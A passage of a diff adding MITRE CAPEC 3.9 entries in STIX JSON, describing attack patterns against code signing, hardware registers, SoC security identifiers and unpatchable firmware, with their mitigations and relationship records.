+ "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Subvert Code-signing Facilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": 
"2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.", + "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.", + "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)", + "Deployed code that has been signed by its authoring vendor, or a partner.", + "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated." + ], + "x_capec_resources_required": [ + "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack." + ], + "x_capec_skills_required": { + "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A given code signing scheme may be fallible due to improper use of cryptography. 
Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", + "id": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e2f360c-c268-4b41-a5b7-b73b41b6ad49", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. 
A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", + "id": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + 
"url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. 
Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.", + "id": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32aef2ed-6339-425f-9acf-8117ffb0c421", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.", + "id": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e7a22ee-e503-4bb5-842d-dccfa1314700", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security lock programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--3ce0cc33-be72-46dc-91f1-c7e2891fb760", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.", + "id": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ffd20-3728-428b-b493-fba7c95d706c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.", + "id": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "modified": "2021-10-21T00:00:00.000Z", + 
"name": "coa-680-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5af32ae4-547c-4e74-97a3-7ac9778fccd7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action.\n ", + "external_references": [ + { + "external_id": "CAPEC-681", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/681.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "description": "PCIe Device Measurement Requirements, 2018--09, Intel Corporation", + "external_id": 
"REF-694", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf" + }, + { + "description": "John Butterworth, Cory Kallenberg, Xeno Kovah, BIOS Chronomancy: Fixing the Core Root of Trust for Measurement, 2013--07---31", + "external_id": "REF-695", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf" + } + ], + "id": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Hardware Security Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \"1\" and \"2\". The Main-controller (ID \"1\") is meant to have access to the AES-key registers, while the Aux-controller (ID \"2\") has access to the access-policy register. 
If a SoC incorrectly generates security identifier \"1\" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.\n " + ], + "x_capec_extended_description": "\n A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:\n \n The security identifiers are missing\n The security identifiers are incorrectly implemented or generated\n The security identifiers are generated with an obsolete encoding\n The security identifiers are generated and implemented correctly, but are improperly protected\n \n If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of the identifiers being utilized.", + "Medium": "Ability to execute actions within the SoC." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d0df491b-0667-4d31-9aa1-9a9f21ccbc1c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review security identifier decoders for design inconsistencies and common weaknesses.", + "id": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38e2a6ae-74e9-48d2-8118-bf5c8494a56c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": 
[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1cc36ea-b168-4d92-b480-8c003969dc5a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "spec_version": "2.1", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. 
Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code 
with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

  2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

  2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems and products with the ability to patch firmware or ROM code after deployment to fix vulnerabilities.", + "id": "course-of-action--2ca1e82e-84ae-463a-adbf-1d60e3f3a72c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--356d9eee-96bf-4426-b750-ee52f3559653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2ca1e82e-84ae-463a-adbf-1d60e3f3a72c", + "spec_version": "2.1", + "target_ref": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--9f1f6ddb-9f30-4b10-870f-d65ecbef0d8c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5d15986-f2d6-4124-8dae-11ab17a58bde", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f1f6ddb-9f30-4b10-870f-d65ecbef0d8c", + "spec_version": "2.1", + "target_ref": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets programs running with elevated privileges. 
